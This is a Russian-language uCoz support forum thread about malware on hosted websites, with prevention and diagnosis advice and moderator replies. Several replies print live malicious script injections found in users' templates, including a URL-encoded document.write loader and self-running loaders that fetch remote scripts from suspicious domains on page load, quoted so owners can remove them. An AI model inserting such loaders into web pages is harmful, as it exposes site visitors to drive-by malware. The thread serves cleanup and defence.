Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    dielf
    Сообщений: 8
    Репутация: -1

    Сообщение # 1111 | 17:47:09 25 Фев 2014
    Здравствуйте, срочно нужна помощ, на моем сайте Gamespro-portal
    был замечен яндексом вирус "мобильный редирект" ,я даже не знаю как выглядет код этого вируса! помогите, заранее спасибо!
    http://mind.3dn.ru
    zabir16
    Сообщений: 2
    Репутация: 0

    Сообщение # 1112 | 19:19:26 25 Фев 2014
    webanet, Здравствуйте!! у меня вот такая проблема,в моем сайте http://sibaymebel.3dn.ru/ есть 2 баннера с рекламой сверху и снизу появляются,когда захожу в свой аккаунт они исчезают,весь смысл проблемы в том что эти рекламы видны только на мобильном телефоне в браузере explorer,у друга попробовал зайти тоже самое,а на комп браузерах их вообще нет,интересно где искать,можете помощь?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1113 | 19:26:27 25 Фев 2014
    dielf, из шаблонов форума удалите скрипт

    Код
    <noindex>
    <script language='javascript' type='text/javascript' src='http://mobiledirectors.com/90k6u4gfify70hpx29rs436p5ld3b4g0b16wlxtga3i'></script>
    </noindex>


    и вот этот скрипт
    Код

    <script type="text/javascript">
    <!--
    document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61 %73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%73%6 9%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E'));
    //-->
    </script>


    последний расшифровывается как
    Код

    <script type="text/javascript">
    <!--
    document.write(unescape('<script type="text/javascript" src="http://avataria-vkontakte.ru/js/site.js"></script>'));
    //-->
    </script>


    после очистки идите в вебмастер яндекса и жмите на перепроверку сайта
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1114 | 19:30:18 25 Фев 2014
    zabir16, на сайте вроде чисто под гостем. возможно вы видите новую рекламу от юкоз для мобильных. точнее можно сказать будет только взглянув на баннеры. если можно, сделайте скриншоты баннеров, которые вас беспокоят
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1115 | 19:33:24 25 Фев 2014
    zabir16, судя по описанию, это реклама веб-сервиса uCoz, транслируются пользователям мобильных устройств

    zabir16
    Сообщений: 2
    Репутация: 0

    Сообщение # 1116 | 20:03:09 25 Фев 2014
    да,это реклама веб-сервиса uCoz
    dielf
    Сообщений: 8
    Репутация: -1

    Сообщение # 1117 | 21:55:50 25 Фев 2014
    Спасибо большое))
    http://mind.3dn.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1118 | 19:38:38 27 Фев 2014
    Sergey1972, ваш сайт не относится к системе юкоз. обратитесь в свою тех.поддержку за помощью
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Sargas
    Сообщений: 1
    Репутация: 0

    Сообщение # 1119 | 13:52:19 01 Мар 2014
    Здравствуйте!
    У некоторых пользователей антивирус ругается на мой сайт http://tselitel.com. В частности, касперский. Сам я, сколько ни пытался, ничего не нашел. Онлайн - проверки говорят только следующее: На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
    Касперский пишет о ссылке на подозрительный ресурс " chingachqook.net ".
    Пожалуйста, помогите решить эту проблему.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1120 | 14:07:11 01 Мар 2014
    Sargas, в самом низу шаблонов удалите

    Код
    <script type="text/javascript">
       (function(w) {
       var script = document.createElement('script');
       var i = setInterval(function() {
       if (typeof w.document.body !== 'undefined') {
       script.src = 'http://tafyjigvchrh.country-for.info' + '/?802649=LWQtK387NTY6MjA9KmRoaGBvb2s';
       w.document.body.appendChild(script);
       clearInterval(i);
       }
       }, 200);
    };)window);
    </script>


    и

    Код
    <script type="text/javascript">
       (function(w) {
       var script = document.createElement('script');
       var i = setInterval(function() {
       if (typeof w.document.body !== 'undefined') {
       script.src = 'http://reqwfqcbf.country-for.info' + '/?505459=B04HAVURHxwQGBoXAE5CQkpFRUM';
       w.document.body.appendChild(script);
       clearInterval(i);
       }
       }, 200);
    };)window);
    </script>


    и

    Код
    <script type="text/javascript">
       (function(w) {
       var script = document.createElement('script');
       var i = setInterval(function() {
       if (typeof w.document.body !== 'undefined') {
       script.src = 'http://qufttswhben.country-for.info' + '/?89394=Rg9GQBRQXl1RWVtWQQ8DAwsEBAI';
       w.document.body.appendChild(script);
       clearInterval(i);
       }
       }, 200);
    };)window);
    </script>


    Код
    <script type="text/javascript">
       (function(w) {
       var script = document.createElement('script');
       var i = setInterval(function() {
       if (typeof w.document.body !== 'undefined') {
       script.src = 'http://qufttswhben.country-for.info' + '/?109766=svuytOCkqqmlra-itfv39__w8PQ';
       w.document.body.appendChild(script);
       clearInterval(i);
       }
       }, 200);
    };)window);
    </script>


    если вы не ставили эту рекламу сами к себе на главную, то смените пароли и запретите доступ к коду сайта всех и к панели управления , кроме себя
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Firestarter
    Сообщений: 1
    Репутация: 0

    Сообщение # 1121 | 15:22:55 02 Мар 2014
    Доброго времени суток! Я не совсем опытный в этих делах и не смог найти ответа на свой вопрос.Подскажите пожалуйста,почему зайдя на сайт http://melodysoul.ru антивирус ESET NOD32 выдает информацию о том,что на сайте находится вирус .Однако другие антивирусы ничего не находят.Буду признателен если поможете решить эту проблему.Заранее огромное спасибо.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1122 | 19:29:32 02 Мар 2014
    Firestarter, дайте читаемый скрин или текст блокировки есета
    а для начала удалите кнопку вверх с сайта и не подгружайте ни кнопки ни другие элементы с таких низкосортных сайтов. или перелейте кнопку к себе на сайт, удалив копирайт, который туда вставили владельцы сайта, хотя к написанию скрипта причастия не имели
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    koluchij
    Сообщений: 13
    Репутация: 3

    Сообщение # 1123 | 16:16:44 03 Мар 2014
    http://sputnikavto.com/
    не могу найти вирь. яндекс и аваст ругаются.
    Per Aspera Ad Astra
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1124 | 18:14:00 03 Мар 2014
    Цитата koluchij ()
    не могу найти вирь. яндекс и аваст ругаются.


    koluchij, для начала поставьте нормально код копирайта системы uCoz во всех шаблонах $POWERED_BY$ он у вас вынесен за пределы закрывающего тега html что является нарушением.

    В каталоге файлов в шаблонах удалите скрипт:

    Код
    <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


    Можете это сделать через быструю замену, для этого переходите в Панель Управления - Дизайн - Управление дизайном - Быстрая замена.

    В поле что заменить вставляете этот скрипт:

    Код
    <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


    поле на что заменить оставляете пустым. Замену делайте в модуле каталог файлов.

    После этого смените пароль uID профиля //forum.ucoz.ru/forum/45-52299-1
    Также читайте тему //forum.ucoz.ru/forum/45-57475-1

    Аваст может ругаться на картинки вставленные со сторонних сайтов.
    srrpp15845
    Сообщений: 29
    Репутация: 0

    Сообщение # 1125 | 21:31:54 04 Мар 2014
    аш IP адрес: 168.61.82.88

    История

    Имя вашего компьютера:

    168.61.82.88

    Операционная система:

    Microsoft Windows 8.0

    Ваш браузер:

    Firefox 26.0

    Откуда вы:

    United States

    Ваш провайдер:

    EP.NET, LLC.




    Прокси:

    Не используется

    Добавлено (21 Фев 2014, 22:51:40)
    ---------------------------------------------
    выложить вирус ?
    всего 331 килобайт

    Добавлено (04 Мар 2014, 21:31:54)
    ---------------------------------------------
    Файл выложить ?
    на сервере Windows Sever файл не запустился ..
    Сообщение отредактировал srrpp15845 - Вторник, 04 Мар 2014, 21:32:54
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: